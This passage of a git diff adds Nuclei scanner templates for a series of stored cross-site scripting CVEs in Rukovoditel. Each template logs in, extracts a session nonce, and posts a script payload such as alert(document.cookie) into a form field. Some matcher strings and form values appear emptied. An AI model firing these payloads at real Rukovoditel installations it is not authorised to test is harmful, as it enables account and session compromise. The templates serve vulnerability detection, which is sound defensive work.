form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2020/CVE-2020-35987.yaml b/http/cves/2020/CVE-2020-35987.yaml new file mode 100644 index 0000000000..14e50a21e4 --- /dev/null +++ b/http/cves/2020/CVE-2020-35987.yaml @@ -0,0 +1,59 @@ +id: CVE-2020-35987 + +info: + name: Rukovoditel <= 2.7.2 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter. + reference: + - https://github.com/r0ck3t1973/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-35987 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2020-35987 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2020,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/&action=save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0¬es=test + + cookie-reuse: true + redirects: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-43164.yaml b/http/cves/2022/CVE-2022-43164.yaml new file mode 100644 index 0000000000..8afb4901bd --- /dev/null +++ b/http/cves/2022/CVE-2022-43164.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-43164 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/4 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43164 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43164 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2022,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43165.yaml b/http/cves/2022/CVE-2022-43165.yaml new file mode 100644 index 0000000000..f316ac4f11 --- /dev/null +++ b/http/cves/2022/CVE-2022-43165.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43165 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking "Create". + reference: + - https://github.com/anhdq201/rukovoditel/issues/5 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43165 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43165 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43166.yaml b/http/cves/2022/CVE-2022-43166.yaml new file mode 100644 index 0000000000..8712f72c85 --- /dev/null +++ b/http/cves/2022/CVE-2022-43166.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43166 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Entity". + reference: + - https://github.com/anhdq201/rukovoditel/issues/2 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43166 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43166 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43167.yaml b/http/cves/2022/CVE-2022-43167.yaml new file mode 100644 index 0000000000..36d78662c1 --- /dev/null +++ b/http/cves/2022/CVE-2022-43167.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43167 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Users Alerts feature (/index.php?module=users_alerts/users_alerts) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/7 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43167 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43167 + cwe-id: CWE-79 + metadata: + verified: "true" + shodan-query: http.favicon.hash:-1499940355 + max-request: 3 + tags: cve,cve2022,rukovoditel,stored,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_alerts/users_alerts&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=warning&title=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&location=all&start_date=&end_date= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43169.yaml b/http/cves/2022/CVE-2022-43169.yaml new file mode 100644 index 0000000000..b45ddcd568 --- /dev/null +++ b/http/cves/2022/CVE-2022-43169.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-43169 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Users Access Groups feature (/index.php?module=users_groups/users_groups) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add New Group". + reference: + - https://github.com/anhdq201/rukovoditel/issues/3 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43169 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43169 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=users_groups/users_groups&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=¬es=&ldap_filter= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-43170.yaml b/http/cves/2022/CVE-2022-43170.yaml new file mode 100644 index 0000000000..3e45934dcf --- /dev/null +++ b/http/cves/2022/CVE-2022-43170.yaml @@ -0,0 +1,60 @@ +id: CVE-2022-43170 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Dashboard Configuration feature (index.php?module=dashboard_configure/index) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title parameter after clicking "Add info block". + reference: + - https://github.com/anhdq201/rukovoditel/issues/6 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43170 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43170 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=dashboard_configure/index&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=info_block&is_active=1§ions_id=0&color=default&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&icon=&description=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-43185.yaml b/http/cves/2022/CVE-2022-43185.yaml new file mode 100644 index 0000000000..83416143de --- /dev/null +++ b/http/cves/2022/CVE-2022-43185.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-43185 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/1 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-43185 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-43185 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31 + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-44944.yaml b/http/cves/2022/CVE-2022-44944.yaml new file mode 100644 index 0000000000..5802278e39 --- /dev/null +++ b/http/cves/2022/CVE-2022-44944.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44944 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Announcement function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/14 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44944 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44944 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=announcement&is_active=1&color=default&icon=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&description=&start_date=&end_date=&sort_order= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44946.yaml b/http/cves/2022/CVE-2022-44946.yaml new file mode 100644 index 0000000000..0801892bf4 --- /dev/null +++ b/http/cves/2022/CVE-2022-44946.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44946 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add Page function at /index.php?module=help_pages/pages&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/15 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44946 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44946 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=help_pages/pages&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&type=page&is_active=1&position=listing&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=&description= + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-44947.yaml b/http/cves/2022/CVE-2022-44947.yaml new file mode 100644 index 0000000000..897d16e2e4 --- /dev/null +++ b/http/cves/2022/CVE-2022-44947.yaml @@ -0,0 +1,61 @@ +id: CVE-2022-44947 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Highlight Row feature at /index.php?module=entities/listing_types&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Note field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/13 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44947 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44947 + cwe-id: CWE-79 + metadata: + verified: true + shodan-query: http.favicon.hash:-1499940355 + tags: cve,cve2022,rukovoditel,stored,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/listing_highlight&action=save&entities_id=24&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&is_active=1&fields_id=193&fields_values%5B%5D=67&bg_color=&sort_order=¬es=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44948.yaml b/http/cves/2022/CVE-2022-44948.yaml new file mode 100644 index 0000000000..df5122ae57 --- /dev/null +++ b/http/cves/2022/CVE-2022-44948.yaml @@ -0,0 +1,59 @@ +id: CVE-2022-44948 + +info: + name: Rukovoditel <= 3.2.1 - Cross-Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Entities Group feature at/index.php?module=entities/entities_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field after clicking "Add". + reference: + - https://github.com/anhdq201/rukovoditel/issues/8 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44948 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44948 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/entities_groups&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sort_order=0 + + cookie-reuse: true + redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + internal: true + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' diff --git a/http/cves/2022/CVE-2022-44949.yaml b/http/cves/2022/CVE-2022-44949.yaml new file mode 100644 index 0000000000..2cb5e694f9 --- /dev/null +++ b/http/cves/2022/CVE-2022-44949.yaml @@ -0,0 +1,128 @@ +id: CVE-2022-44949 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Short Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/12 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44949 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44949 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="entities_id" + + 24 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="forms_tabs_id" + + 29 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="name" + + test + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="short_name" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="type" + + fieldtype_input + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[width]" + + input-small + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[default_value]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[is_unique]" + + 0 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[unique_error_msg]" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="required_message" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="tooltip_item_page" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access_template" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[5]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="access[4]" + + yes + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="notes" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf-- + + cookie-reuse: true + redirects: true + max-redirects: 3 + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(content_type_3, "text/html")' + - 'contains(body_3, "")' + - 'contains(body_3, "rukovoditel")' + condition: and + + extractors: + - type: regex + name: nonce + group: 1 + regex: + - 'id="form_session_token" value="(.*)" type="hidden"' + internal: true diff --git a/http/cves/2022/CVE-2022-44950.yaml b/http/cves/2022/CVE-2022-44950.yaml new file mode 100644 index 0000000000..b0857fad91 --- /dev/null +++ b/http/cves/2022/CVE-2022-44950.yaml @@ -0,0 +1,128 @@ +id: CVE-2022-44950 + +info: + name: Rukovoditel <= 3.2.1 - Cross Site Scripting + author: r3Y3r53 + severity: medium + description: | + Rukovoditel v3.2.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the Add New Field function at /index.php?module=entities/fields&entities_id=24. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field. + reference: + - https://github.com/anhdq201/rukovoditel/issues/10 + - http://rukovoditel.com/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-44950 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-44950 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2022,rukovoditel,xss,authenticated + +http: + - raw: + - | + GET /index.php?module=users/login HTTP/1.1 + Host: {{Hostname}} + + - | + POST /index.php?module=users/login&action=login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_session_token={{nonce}}&username={{username}}&password={{password}} + + - | + POST /index.php?module=entities/fields&action=save&token={{nonce}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfKx13B5QBU5Sccgf + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="form_session_token" + + {{nonce}} + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="entities_id" + + 24 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="forms_tabs_id" + + 29 + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="name" + + + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="short_name" + + test + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="type" + + fieldtype_input + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; name="fields_configuration[width]" + + input-small + ------WebKitFormBoundaryfKx13B5QBU5Sccgf + Content-Disposition: form-data; 